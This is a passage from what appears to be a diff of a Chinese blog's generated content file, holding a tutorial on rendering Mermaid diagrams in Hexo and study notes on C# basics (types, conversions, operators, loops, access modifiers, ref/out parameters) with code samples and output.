    用法 | Mermaid 中文网 (nodejs.cn) 这里有写如何使用 mermaid.min.js 将 mermaid 语法的字符串转为 svg 字符串并生成 DOM。

    <script type="text/javascript" src="/js/mermaid.min.js"></script>
    <script>mermaid.initialize({startOnLoad:false}); // startOnLoad 应设为 false,但好像设为 true 也没事……</script>

    <script>
    // Example of using the render function
    const drawDiagram = async function (graphDefinition, id) {
    // 转换为 svg 语句
    const { svg } = await mermaid.render('graphDiv', graphDefinition);
    const outputContainer = document.getElementById(id);
    // 将 HTML 语句插入到容器中
    outputContainer.innerHTML = svg;
    };
    </script>

    <div id="output-container"></div>

    <script type="module">
    await drawDiagram(`
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    `, 'output-container');
    </script>

    ​这么写感觉渲染快了很多……不知道为什么。

    hexo 插件

    ​ hexo 有这么一个插件:webappdevelp/hexo-filter-mermaid-diagrams: mermaid diagrams for hexo (github.com)

    ​安装它!

    npm install --save hexo-filter-mermaid-diagrams

    ​这个插件的原理就是将下面的 Markdown 语句:

    ```mermaid
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    ```

    ​渲染成:

    <pre class="mermaid">graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;</pre>

    ​然后再自行调用相关函数进行渲染。

    ]]>
    + 资源

    快速开始

    自动挡

    ​获取文件:https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js

    ​导入文件并使用 mermaid.initialize({startOnLoad:true}); 加载:

    ​使用 <pre class="mermaid"></pre> 内包含语句定义图表:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <script type="text/javascript" src="/js/mermaid.min.js"></script>
    <script>mermaid.initialize({startOnLoad:true});</script>
    <pre class="mermaid">
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    </pre>
    graph TD;    A-->B;    A-->C;    B-->D;    C-->D;

    ​更多语法见官方文档。这个工具使用了较为简洁的语法实现了画图的功能。(感觉好慢……)

    手动挡

    用法 | Mermaid 中文网 (nodejs.cn) 这里有写如何使用 mermaid.min.js 将 mermaid 语法的字符串转为 svg 字符串并生成 DOM。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <script type="text/javascript" src="/js/mermaid.min.js"></script>
    <script>mermaid.initialize({startOnLoad:false}); // startOnLoad 应设为 false,但好像设为 true 也没事……</script>

    <script>
    // Example of using the render function
    const drawDiagram = async function (graphDefinition, id) {
    // 转换为 svg 语句
    const { svg } = await mermaid.render('graphDiv', graphDefinition);
    const outputContainer = document.getElementById(id);
    // 将 HTML 语句插入到容器中
    outputContainer.innerHTML = svg;
    };
    </script>

    <div id="output-container"></div>

    <script type="module">
    await drawDiagram(`
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    `, 'output-container');
    </script>

    ​这么写感觉渲染快了很多……不知道为什么。

    hexo 插件

    ​ hexo 有这么一个插件:webappdevelp/hexo-filter-mermaid-diagrams: mermaid diagrams for hexo (github.com)

    ​安装它!

    1
    npm install --save hexo-filter-mermaid-diagrams

    ​这个插件的原理就是将下面的 Markdown 语句:

    ```mermaid
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    ```

    ​渲染成:

    1
    2
    3
    4
    5
    <pre class="mermaid">graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;</pre>

    ​然后再自行调用相关函数进行渲染。

    ]]>
    @@ -1089,7 +1089,7 @@ /posts/PL-RUNOOB-CSharp/ - 正文

    基础语法

    Hello world

    webp

    ​VS 里创建一个 控制台应用(.NET Framework)

    webp

    ​开始 Hello World!

    using System;
    namespace HelloWorldApplication
    {
    /* 类名为 HelloWorld */
    class HelloWorld
    {
    /* main 函数 */
    static void Main(string[] args)
    {
    /* 我的第一个 C# 程序 */
    Console.WriteLine("Hello World!");
    Console.ReadKey();
    }
    }
    }

    C# 环境

    C# 是 .Net 框架的一部分,且用于编写 .Net 应用程序。

    Unity 使用开源 .NET 平台,以确保使用 Unity 创建的应用程序可以在各种不同的硬件配置上运行。

    .Net 框架是一个创新的平台,能帮您编写出下面类型的应用程序:

    • Windows 应用程序
    • Web 应用程序
    • Web 服务

    C# 程序结构

    一个 C# 程序主要包括以下部分:

    • 命名空间声明(Namespace declaration)
    • 一个 class
    • Class 方法
    • Class 属性
    • 一个 Main 方法
    • 语句(Statements)& 表达式(Expressions)
    • 注释
    using System;  // using 关键字用于在程序中包含 System 命名空间。
    namespace HelloWorldApplication // 一个 namespace 里包含了一系列的类。便于管理,还可以防止类重名,在这里也可以不写。
    {
    class HelloWorld // C# 是完全面向对象的语言,执行代码必须放在一个类中
    {
    static void Main(string[] args) // Main 方法,是所有 C# 程序的入口点。Main 方法说明当执行时类将做什么动作。
    {
    /* 我的第一个 C# 程序*/
    Console.WriteLine("Hello World");
    Console.ReadKey(); // 针对 VS.NET 用户的。这使得程序会等待一个按键的动作,防止程序从 Visual Studio .NET 启动时屏幕会快速运行并关闭。在 VS2022 中,也可以 Ctrl + F5 启动调试防止控制台自动关闭。
    }
    }
    }

    C# 基本语法

    ​C# 是一种面向对象的编程语言。在面向对象的程序设计方法中,程序由各种相互交互的对象组成。相同种类的对象通常具有相同的类型,或者说,是在相同的 class 中。

    ​例如,以 Rectangle(矩形)对象为例。它具有 lengthwidth 属性。根据设计,它可能需要接受这些属性值、计算面积和显示细节。

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    double length;
    double width;
    public void Acceptdetails()
    {
    length = 4.5;
    width = 3.5;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle();
    r.Acceptdetails();
    r.Display();
    Console.ReadLine();
    }
    }
    }
    Length: 4.5
    Width: 3.5
    Area: 15.75

    C# 数据类型

    在 C# 中,变量分为以下几种类型:

    • 值类型(Value types)
    • 引用类型(Reference types)
    • 指针类型(Pointer types)

    值类型(Value types)

    using System;

    namespace ConsoleApplication1
    {
    class Program
    {
    static void Main(string[] args)
    {
    PrintValueTypeRange();
    }
    static void PrintValueTypeRange()
    {
    Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
    Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
    Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
    Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
    Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
    Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
    Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
    Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
    Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
    Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
    Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
    Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
    Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
    Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
    Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
    Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
    Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
    Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
    Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
    Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
    Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
    Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
    Console.ReadKey();
    }
    }
    }
    int      类型的最大值是:2147483647
    uint 类型的最大值是:4294967295
    byte 类型的最大值是:255
    sbyte 类型的最大值是:127
    short 类型的最大值是:32767
    ushort 类型的最大值是:65535
    long 类型的最大值是:9223372036854775807
    ulong 类型的最大值是:18446744073709551615
    float 类型的最大值是:3.402823E+38
    double 类型的最大值是:1.79769313486232E+308
    decimal 类型的最大值是:79228162514264337593543950335
    int 类型的最小值是:-2147483648
    uint 类型的最小值是:0
    byte 类型的最小值是:0
    sbyte 类型的最小值是:-128
    short 类型的最小值是:-32768
    ushort 类型的最小值是:0
    long 类型的最小值是:-9223372036854775808
    ulong 类型的最小值是:0
    float 类型的最小值是:-3.402823E+38
    double 类型的最小值是:-1.79769313486232E+308
    decimal 类型的最小值是:-79228162514264337593543950335

    ​Decimal 不是浮点数据类型。Decimal 结构包含一个二进制整数值以及一个符号位和一个整数比例因子,该比例因子用于指定该值的小数部分。因此,在内存中,Decimal 数字的表示形式比浮点类型(Single 和 Double)更精确。Decimal 数据类型用于存储精确的小数值。与 Float 和 Double 等浮点数数据类型相比,Decimal 能够提供更高的精度,避免了浮点数计算中的舍入误差。

    ​如需得到一个类型或一个变量在特定平台上的准确尺寸,可以使用 sizeof 方法。表达式 sizeof(type) 产生以字节为单位存储对象或类型的存储尺寸。

    using System;

    namespace DataTypeApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Size of bool: {0}", sizeof(bool));
    Console.WriteLine("Size of byte: {0}", sizeof(byte));
    Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
    Console.WriteLine("Size of int: {0}", sizeof(int));
    Console.WriteLine("Size of float: {0}", sizeof(float));
    Console.WriteLine("Size of double: {0}", sizeof(double));
    Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
    Console.ReadLine();
    }
    }
    }
    Size of bool: 1
    Size of byte: 1
    Size of sbyte: 1
    Size of int: 4
    Size of float: 4
    Size of double: 8
    Size of decimal: 16

    对象(Object)类型

    对象(Object)类型是 C# 通用类型系统(Common Type System - CTS)中所有数据类型的终极基类。Object 是 System.Object 类的别名。所以对象(Object)类型可以被分配任何其他类型(值类型、引用类型、预定义类型或用户自定义类型)的值。但是,在分配值之前,需要先进行类型转换。

    ​当一个值类型转换为对象类型时,则被称为装箱;另一方面,当一个对象类型转换为值类型时,则被称为拆箱

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 原始值类型
    int original = 10;

    // 装箱过程,将 int 类型装箱为 object 类型
    object boxed = original;

    // 拆箱过程,将 object 类型拆箱为 int 类型
    int unboxed = (int)boxed;

    Console.WriteLine($"原始值:{original}");
    Console.WriteLine($"拆箱后的值:{unboxed}");
    }
    }
    }
    原始值:10
    拆箱后的值:10

    动态(Dynamic)类型

    ​您可以存储任何类型的值在动态数据类型变量中。这些变量的类型检查是在运行时发生的。

    ​声明动态类型的语法:

    dynamic d = 20;

    ​动态类型与对象类型相似,但是对象类型变量的类型检查是在编译时发生的,而动态类型变量的类型检查是在运行时发生的

    ​静态类型语言也被称为强类型语言。所谓强类型语言,通俗的讲,就是在编译过程中执行类型检查的语言。我们举个简单的例子,比如我们知道一个方法的返回类型,但是如果返回类型过于复杂,那么我推荐你使用 var。但是,当你明确知道返回类型时,或者返回的只是简单类型,那么我推荐你直接使用该数据类型来声明方法返回类型,就像平时我们经常用 stringintbool 等修饰符声明返回类型一样。

    var dynamic 关键字之间的主要区别在于绑定时间不一样:var 是早期绑定,dynamic 绑定则会在运行时进行。

    var 实际上是编译器抛给我们的语法糖,一旦被编译,编译器就会自动匹配 var 变量的实际类型,并用实际类型来替换该变量的声明,等同于我们在编码时使用了实际类型声明。而 dynamic 被编译后是一个 Object 类型,编译器编译时不会对 dynamic 进行类型检查。

    字符串(String)类型

    字符串(String)类型 允许您给变量分配任何字符串值。字符串(String)类型是 System.String 类的别名。它是从对象(Object)类型派生的。字符串(String)类型的值可以通过两种形式进行分配:引号@引号

    ​例如:

    string str = "runoob.com";

    ​C# string 字符串的前面可以加 @(称作"逐字字符串")将转义字符\当作普通字符对待(类似于 python 里的原始字符串前缀 r?),比如:

    string str = @"C:\Windows";

    ​等价于:

    string str = "C:\\Windows";

    ​@ 字符串中可以任意换行,换行符及缩进空格都计算在字符串长度之内

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = @"<script type=""text/javascript"">
    <!--
    -->
    </script>";
    Console.WriteLine(str);
    Console.ReadLine();
    }
    }
    }
    <script type="text/javascript">
    <!--
    -->
    </script>

    ​用户自定义引用类型有:classinterfacedelegate。我们将在以后的章节中讨论这些类型。

    指针类型(Pointer types)

    ​指针类型变量存储另一种类型的内存地址。C# 中的指针与 C 或 C++ 中的指针有相同的功能。

    type* identifier;

    C# 类型转换

    ​C# 中的类型转换可以分为两种:隐式类型转换显式类型转换(也称为强制类型转换)。

    隐式类型转换

    ​隐式转换是不需要编写代码来指定的转换,编译器会自动进行。

    ​隐式转换是指将一个较小范围的数据类型转换为较大范围的数据类型时(如,从 intlong,从 floatdouble 等),编译器会自动完成类型转换,这些转换是 C# 默认的以安全方式进行的转换,不会导致数据丢失

    byte b = 10;
    int i = b; // 隐式转换,不需要显式转换

    显式转换

    ​显式类型转换,即强制类型转换,需要程序员在代码中明确指定。

    ​显式转换是指将一个较大范围的数据类型转换为较小范围的数据类型时,或者将一个对象类型转换为另一个对象类型时,需要使用强制类型转换符号进行显示转换,强制转换(可能)会造成数据丢失

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    double a = 3.141592653589;
    float b = 3.141592653589f;

    Console.WriteLine(a + "");
    Console.WriteLine((float)a + "");
    Console.WriteLine(b);
    Console.ReadLine();
    }
    }
    }
    3.141592653589
    3.141593
    3.141593

    C# 类型转换方法

    ​使用 System.Convert 类中的函数来进行类型转换。提供了一种安全的方式来执行类型转换,因为它们可以处理 null 值,如果转换不可能进行,则会抛出异常

    为什么 C# 没有 System.Convert.ToFloat()

    ​有。但它被称为 Convert.ToSingle()float 是类型 System.Single 的 C# 别名。

    ​“Single”是 BCL 中浮点数的名称。“float” 是 C# 提供的别名。有一个 Convert.ToSingle() 方法,就像有 Convert.ToInt32() 而不是 Convert.ToInt()


    float, int 这种类型只是 C# 的语法糖而已,在 .NET 框架中他们是 SingleInt32 等等。因此,Convert.ToFloat() 实际上是 Convert.ToSingle

    ​《CLR via C#》的作者推荐永远不要使用 int, short, float 等等,而是使用 Int32, Int16, Single 这些原生类型,这样在跨语言编程时才不会由于某种特定语言的特性而都不同类型产生迷惑。(说得好我还是接着用)

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string a = "3.1415926535";
    float b = Convert.ToSingle(a);
    Single c = Convert.ToSingle(a);
    double d = Convert.ToDouble(a);

    Console.WriteLine(a);
    Console.WriteLine(b);
    Console.WriteLine(c);
    Console.WriteLine(d);
    Console.ReadLine();
    }
    }
    }
    3.1415926535
    3.141593
    3.141593
    3.1415926535

    .ToString() 可将特定类型转换为字符串,当然也可以使用 +""

    using System;

    namespace TypeConversionApplication
    {
    class StringConversion
    {
    static void Main(string[] args)
    {
    int i = 75;
    float f = 53.005f;
    double d = 2345.7652;
    bool b = true;
    Console.WriteLine(i.ToString());
    Console.WriteLine(f.ToString());
    Console.WriteLine(d.ToString());
    Console.WriteLine(b.ToString());
    Console.ReadKey();
    }
    }
    }

    使用 Parse 方法

    ​Parse 方法用于将字符串转换为对应的数值类型,如果转换失败会抛出异常。

    string str = "123.45";
    double d = double.Parse(str);

    使用 TryParse 方法

    ​TryParse 方法类似于 Parse,但它不会抛出异常,而是返回一个布尔值指示转换是否成功。

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = "123.45";
    double d;
    bool success = double.TryParse(str, out d);

    if (success)
    {
    Console.WriteLine("转换成功: " + d);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    int i;
    success = int.TryParse(str, out i);

    if (success)
    {
    Console.WriteLine("转换成功: " + i);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    Console.ReadKey();
    }
    }
    }
    转换成功: 123.45
    转换失败

    自定义类型转换

    ​C# 还允许你定义自定义类型转换操作,通过在类型中定义 implicitexplicit 关键字。

    using System;

    public class Fahrenheit
    {
    public double Degrees { get; set; }

    public Fahrenheit(double degrees)
    {
    Degrees = degrees;
    }

    // 隐式转换从华氏温度转为摄氏温度
    public static implicit operator Celsius(Fahrenheit f)
    {
    return new Celsius((f.Degrees - 32) / 1.8);
    }

    // 显式转换从摄氏温度转为华氏温度
    public static explicit operator Fahrenheit(Celsius c)
    {
    return new Fahrenheit(32 + c.Degrees * 1.8);
    }
    }

    public class Celsius
    {
    public double Degrees { get; set; }

    public Celsius(double degrees)
    {
    Degrees = degrees;
    }
    }

    public class Program
    {
    public static void Main()
    {
    Celsius c = new Celsius(37);
    Fahrenheit f = new Fahrenheit(98.6);
    Celsius c2 = f; // 使用隐式转换
    Fahrenheit f2 = (Fahrenheit)c; // 使用显式转换

    Console.WriteLine(c.Degrees + "°C");
    Console.WriteLine(f.Degrees + "°F");
    Console.WriteLine(c2.Degrees + "°C");
    Console.WriteLine(f2.Degrees + "°F");

    Console.ReadKey();
    }
    }

    implicit 定义隐式转换。

    explicit 定义显示转换。

    operator 关键字的主要作用是用来重载运算符的,还可以用于类或结构中类型的自定义转换。

    37°C
    98.6°F
    37°C
    98.6°F

    C# 变量

    ​一个变量只不过是一个供程序操作的存储区的名字

    C# 中的变量定义

    ​在 C# 中,变量的命名需要遵循一些规则:

    • 变量名可以包含字母、数字和下划线。
    • 变量名必须以字母或下划线开头。
    • 变量名区分大小写。
    • 避免使用 C# 的关键字作为变量名。

    C# 中的变量初始化

    ​正确地初始化变量是一个良好的编程习惯,否则有时程序会产生意想不到的结果。

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    short a;
    int b;
    double c;

    /* 实际初始化 */
    a = 10;
    b = 20;
    c = a + b;
    Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
    Console.ReadLine();
    }
    }
    }
    a = 10, b = 20, c = 30

    接受来自用户的值

    System 命名空间中的 Console 类提供了一个函数 ReadLine(),用于接收来自用户的输入,并把它存储到一个变量中。(类似 scanf()

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    int num;
    num = Convert.ToInt32(Console.ReadLine());
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }

    C# 中的 Lvalues 和 Rvalues

    ​C# 中的两种表达式:

    1. lvalue:lvalue 表达式可以出现在赋值语句的左边或右边。
    2. rvalue:rvalue 表达式可以出现在赋值语句的右边,不能出现在赋值语句的左边。

    ​变量是 lvalue 的,所以可以出现在赋值语句的左边。数值是 rvalue 的,因此不能被赋值,不能出现在赋值语句的左边。下面是一个有效的语句:

    int g = 20;

    下面是一个无效的语句,会产生编译时错误:

    10 = 20;

    C# 变量作用域

    ​在 C# 中,变量的作用域定义了变量的可见性和生命周期。

    ​变量的作用域通常由花括号 {} 定义的代码块来确定

    方法参数作用域

    ​C# 是完全面向对象的语言,因此全局变量最高能只能放在类定义下:

    class MyClass
    {
    int memberVar = 30; // 成员变量,在整个类中可见
    }

    静态变量作用域

    static 静态变量是在类级别上声明的,但它们的作用域也受限于其定义的类。

    class MyClass
    {
    static int staticVar = 40; // 静态变量,在整个类中可见
    }

    循环变量作用域

    ​在 for 循环中声明的循环变量在循环体内可见。

    for (int i = 0; i < 5; i++)
    {
    // i 在循环体内可见
    }
    // i 在这里不可见

    ​总体而言,变量的作用域有助于管理变量的可见性和生命周期,确保变量在其有效范围内使用,也有助于防止命名冲突。

    C# 常量

    ​常量可以被当作常规的变量,只是它们的值在定义后不能被修改。

    整数常量

    ​整数常量可以是十进制、八进制或十六进制的常量。

    前缀指定基数

    • 0x 或 0X 表示十六进制
    • 0 表示八进制
    • 没有前缀则表示十进制

    ​整数常量也可以有后缀,可以是 U 和 L 的组合,其中:

    • U 和 L 分别表示 unsigned 和 long。

      后缀可以是大写或者小写,多个后缀以任意顺序进行组合。

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    var num = 0xFeeL;
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }
    4078

    浮点常量

    ​一个浮点常量是由整数部分、小数点、小数部分和指数部分组成。您可以使用小数形式或者指数形式来表示浮点常量。

    ​原网页认为 314159E-5L 是合法的,然而测试的时候不合法,只有 314159E-5 合法。

    字符常量

    namespace EscapeChar
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Hello\tWorld\n\n");
    Console.ReadLine();
    }
    }
    }

    ​之类的。

    字符串常量

    string a = "hello, world";  // hello, world
    string b = @"hello, world"; // hello, world
    string c = "hello \t world"; // hello world
    string d = @"hello \t world"; // hello \t world
    string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
    string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
    string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
    string h = @"\\server\share\file.txt"; // \\server\share\file.txt
    string i = "one\r\ntwo\r\nthree";
    string j = @"one
    two
    three";

    ​回车(Carriage Return)和换行(Newline)是两个相关但不同的概念,它们通常一起使用来控制文本在显示或存储时的布局和格式。

    1. 回车 (\r)
      • 回车是一个控制字符,通常表示光标移动到当前行的开头,而不移动到下一行的开头。在早期的打字机和电传打字机中,回车操作会将打印头移回到纸带或打字机纸的左侧(或称为回车位置),这样打印机可以在新行开始时从左侧开始打印。
      • 在计算机领域中,回车通常表示 ASCII 字符中的值为 13(0x0D)。
    2. 换行 (\n)
      • 换行是另一个控制字符,用于指示应该在当前位置插入一个新行。它通常使光标移动到下一行的开头,以便从新的行开始写入文本。
      • 在计算机领域中,换行通常表示 ASCII 字符中的值为 10(0x0A)。

    ​在现代操作系统中,特别是在 Windows、Unix/Linux 和 macOS 等操作系统中,通常使用 \r\n 组合来表示文本文件中的换行符。Windows 使用 \r\n 作为标准换行符,而 Unix 和 Linux 系统通常只使用 \n。这种差异可以导致在跨平台处理文本文件时出现格式化问题。

    ​总结来说:

    • 回车 (\r):将光标移动到当前行的开头。
    • 换行 (\n):将光标移动到下一行的开头,并且可以包含在回车操作中一起使用,以实现在文本中的适当布局和格式。

    定义常量

    ​常量是使用 const 关键字来定义的。

    C# 运算符

    ​基本跟 C/C++ 差不多,记一点没接触过的。

    is 判断对象是否为某一类型。

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    dynamic a = 3.14;
    Console.WriteLine(a is float);
    Console.ReadLine();
    }
    }
    }
    False

    as 强制转换,即使转换失败也不会抛出异常(改为返回 null)。

    using System;

    namespace AsOperatorExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    object obj = "This is a string";

    // Using 'as' operator to cast obj to string
    string str = obj as string;

    if (str != null)
    {
    Console.WriteLine("The object was successfully cast to a string.");
    Console.WriteLine(str);
    }
    else
    {
    Console.WriteLine("The object could not be cast to a string.");
    }

    // Attempting to cast obj to an incompatible type
    obj = 123;
    str = obj as string;

    if (str == null)
    {
    Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
    }
    }
    }
    }
    The object was successfully cast to a string.
    This is a string
    The object could not be cast to a string because it is not a compatible type.

    typeof() 返回 class 的类型。

    using System;

    class Program
    {
    static void Main(string[] args)
    {
    Type type = typeof(string);
    Console.WriteLine(type.FullName);
    Console.ReadKey();
    }
    }
    System.String

    C# 判断

    ​与 C/C++ 一致。

    C# 循环

    ​C# 定义一个数组:

    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

    ​C# 定义一个列表:

    // 创建一个字符串列表
    List<string> myStrings = new List<string>();

    // 向列表添加一些字符串元素
    myStrings.Add("Google");
    myStrings.Add("Runoob");
    myStrings.Add("Taobao");

    ​循环语法大都与 C/C++ 一致。试一下之前一直不太熟悉的 foreach

    class ForEachTest
    {
    static void Main(string[] args)
    {
    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
    foreach (int element in fibarray)
    {
    System.Console.WriteLine(element);
    }
    System.Console.WriteLine();

    // 类似 foreach 循环
    for (int i = 0; i < fibarray.Length; i++)
    {
    System.Console.WriteLine(fibarray[i]);
    }
    System.Console.WriteLine();

    // 设置集合中元素的计算器
    int count = 0;
    foreach (int element in fibarray)
    {
    count += 1;
    System.Console.WriteLine("Element #{0}: {1}", count, element);
    }
    System.Console.WriteLine("Number of elements in the array: {0}", count);
    }
    }
    0
    1
    1
    2
    3
    5
    8
    13

    0
    1
    1
    2
    3
    5
    8
    13

    Element #1: 0
    Element #2: 1
    Element #3: 1
    Element #4: 2
    Element #5: 3
    Element #6: 5
    Element #7: 8
    Element #8: 13
    Number of elements in the array: 8

    C# 封装

    webp

    ​一个 访问修饰符 定义了一个类成员的范围和可见性。C# 支持的访问修饰符如下所示:

    • public:所有对象都可以访问;
    • private:对象本身在对象内部可以访问;
    • protected:只有该类对象及其子类对象可以访问
      • 这样有助于实现继承
    • internal:同一个程序集的对象可以访问;
    • protected internal:访问限于当前程序集或派生自包含类的类型。

    ​比如说:一个人 A 为父类,他的儿子 B(A 的子类),妻子 C(在对象内部但不是子类),私生子 D(注:D 不在他家里,即是子类但不在对象内部)

    ​如果我们给 A 的事情增加修饰符:

    • public 事件,地球人都知道,全公开

    • protected 事件,A,B,D 知道(A 和他的所有儿子知道,妻子 C 不知道)

    • private 事件,只有 A 知道(隐私?心事?)

    • internal 事件,A,B,C 知道(A 家里人都知道,私生子 D 不知道)

    • protected internal 事件,A,B,C,D 都知道,其它人不知道

    C# 方法

    <Access Specifier> <Return Type> <Method Name>(Parameter List)
    {
    Method Body
    }
    • Access Specifier:访问修饰符,这个决定了变量或方法对于另一个类的可见性。
    • Return type:返回类型,一个方法可以返回一个值。返回类型是方法返回的值的数据类型。如果方法不返回任何值,则返回类型为 void
    • Method name:方法名称,是一个唯一的标识符,且是大小写敏感的。它不能与类中声明的其他标识符相同。
    • Parameter list:参数列表,使用圆括号括起来,该参数是用来传递和接收方法的数据。参数列表是指方法的参数类型、顺序和数量。参数是可选的,也就是说,一个方法可能不包含参数。
    • Method body:方法主体,包含了完成任务所需的指令集。

    按值传递参数

    ​这是参数传递的默认方式。在这种方式下,当调用一个方法时,会为每个值参数创建一个新的存储位置。

    ​实际参数的值会复制给形参,实参形参使用的是两个不同内存中的值。所以,当形参的值发生改变时,不会影响实参的值,从而保证了实参数据的安全。下面的实例演示了这个概念:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(int x, int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(a, b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();
    }
    }
    }

    ​当上面的代码被编译和执行时,它会产生下列结果:

    在交换之前,a 的值: 100
    在交换之前,b 的值: 200
    在交换之后,a 的值: 100
    在交换之后,b 的值: 200

    ​a 与 b 交换失败。

    按引用传递参数

    ​引用参数是一个对变量的内存位置的引用。当按引用传递参数时,与值参数不同的是,它不会为这些参数创建一个新的存储位置。引用参数表示与提供给方法的实际参数具有相同的内存位置。

    ​类似于 C/C++ 的指针。

    ​在 C# 中,使用 ref 关键字声明引用参数。下面的实例演示了这点:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(ref int x, ref int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(ref a, ref b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();

    }
    }
    }
    在交换之前,a 的值:100
    在交换之前,b 的值:200
    在交换之后,a 的值:200
    在交换之后,b 的值:100

    按输出传递参数

    ​return 语句可用于只从函数中返回一个值。但是,可以使用 输出参数 来从函数中返回多个值。输出参数会把方法输出的数据赋给自己,其他方面与引用参数相似。

    using System;

    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void getValue(out int x)
    {
    int temp = 5;
    x = temp;
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;

    Console.WriteLine("在方法调用之前,a 的值: {0}", a);

    /* 调用函数来获取值 */
    n.getValue(out a);

    Console.WriteLine("在方法调用之后,a 的值: {0}", a);
    Console.ReadLine();

    }
    }
    }
    在方法调用之前,a 的值: 100
    在方法调用之后,a 的值: 5

    C# 可空类型

    C# 可空类型(Nullable)

    ? 单问号用于对 int、double、bool 等无法直接赋值为 null 的数据类型进行 null 的赋值,意思是这个数据类型是 Nullable 类型的。

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {
    static void Main(string[] args)
